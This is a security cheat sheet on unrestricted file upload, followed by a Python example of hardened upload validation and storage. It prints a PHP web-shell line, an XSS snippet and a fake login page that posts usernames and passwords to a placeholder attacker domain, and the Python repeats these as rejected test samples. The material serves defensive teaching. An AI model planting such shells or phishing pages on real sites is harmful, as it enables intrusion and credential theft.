Unrestricted_File_Upload.md

Unrestricted File Upload

Upload a web shell

Arbitrary commands can be executed with the privileges of the web service's process.[^1]

  • Execute system commands
     <?php system('whoami'); ?>

Upload a file with an HTML extension

If the uploaded file is served from the application's own origin, attacks such as XSS or phishing run under that trusted domain.

  • XSS

     <script>alert()</script>
  • Phishing

     <html>
     <title>Fake Login Page</title>
     <body>
         <h2>Login to Your Account</h2>
         <form action="http://[ATTACKER-DOMAIN]" method="POST">
             <input type="text" name="username" placeholder="Username" required>
             <input type="password" name="password" placeholder="Password" required>
             <input type="submit" value="Login">
         </form>
     </body>
     </html>

Distribute malicious files

Malicious files can be distributed by leveraging the reputation of the hosting domain, since downloads from it are less likely to be questioned by users or filters.

  • exe, bat, dmg...
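All three sections above come down to the same root cause: the server lets the client choose the file's extension, content and location, and then either executes it or serves it from its own origin. The following is an added example of a hardened upload path, written for this page and not taken from the cheat sheet or any project it references. It assumes only the Python standard library, that the upload directory sits outside the web root and is never mapped to a script handler, and that the headers returned by `download_headers()` are attached to the real HTTP response; the allowlist, size cap and sample inputs are constructed for the demonstration.

```python
"""Hardened upload handling (added example; not the cheat sheet's own code).
Assumptions: standard library only; the upload directory is outside the web root
and never mapped to a script handler; download_headers() feeds a real response."""
import os
import secrets
from pathlib import Path

# Allowlist of the only types this application needs. Each maps to the magic
# bytes the content must start with and the Content-Type it is served with.
# Script, HTML and executable extensions are simply absent, so .php, .html,
# .exe, .bat, .dmg ... are all rejected by default.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "pdf": (b"%PDF-", "application/pdf"),
}
MAX_BYTES = 5 * 1024 * 1024  # size cap (constructed value)

# Constructed samples: a minimal PNG header and the upload attempts the page lists.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + bytes(32)
SAMPLES = {
    "shell.php": b"<?php system('whoami'); ?>",    # web shell
    "page.html": b"<script>alert()</script>",      # XSS / phishing page
    "tool.exe": b"MZ" + bytes(16),                 # executable
    "shell.php.png": PNG_SAMPLE,                   # double extension
    "photo.png": b"<?php /* not an image */ ?>",   # extension/content mismatch
    "photo.php\x00.png": PNG_SAMPLE,               # null-byte truncation
}


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, data: bytes) -> str:
    """Return the normalised extension, or raise UploadRejected."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    base = os.path.basename(filename.replace("\\", "/"))  # drop client path parts
    if "\x00" in base:
        raise UploadRejected("null byte in filename")
    parts = base.lower().split(".")
    if len(parts) != 2 or parts[0] == "":            # exactly one extension
        raise UploadRejected("one extension required")
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f".{ext} not allowed")
    if not data.startswith(ALLOWED_TYPES[ext][0]):   # content must match type
        raise UploadRejected("content does not match extension")
    return ext


def is_accepted(filename: str, data: bytes) -> bool:
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(filename: str, data: bytes, upload_dir: Path) -> Path:
    """Validate, then write under a server-chosen random name with no execute bit."""
    ext = validate_upload(filename, data)
    upload_dir.mkdir(parents=True, exist_ok=True)
    dest = upload_dir / f"{secrets.token_hex(16)}.{ext}"
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return dest


def download_headers(stored_name: str) -> dict:
    """Headers for serving a stored file: forced download, no MIME sniffing,
    and a sandboxed CSP so nothing inside it can run in the site's origin."""
    content_type = ALLOWED_TYPES[stored_name.rsplit(".", 1)[-1]][1]
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def demo() -> dict:
    """Exercise the checks against the constructed samples; returns the outcomes."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        upload_dir = Path(tmp) / "uploads"
        dest = store_upload("../../../photo.png", PNG_SAMPLE, upload_dir)
        return {
            "stored_in_upload_dir": dest.parent == upload_dir,
            "random_name": dest.name != "photo.png" and dest.suffix == ".png",
            "no_exec_bit": (dest.stat().st_mode & 0o111) == 0,
            "rejected": sorted(n for n, b in SAMPLES.items() if not is_accepted(n, b)),
        }


if __name__ == "__main__":
    print(demo())
```

Each layer addresses one section of the page: the allowlist plus magic-byte check stops script and HTML extensions (web shell, XSS, phishing page) and renamed executables; the server-chosen random name and `O_EXCL` write outside the web root mean the footnote's precondition (a file with the interpreter's extension, in a location the server executes) can never be met; and `Content-Disposition: attachment` with `nosniff` and a sandboxed CSP ensures that even a file which slips through is downloaded rather than rendered in the application's origin.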

Footnotes

[^1]: Command execution is possible only when a file with the extension of the language running on the service can be uploaded and the file is stored where the server will execute it.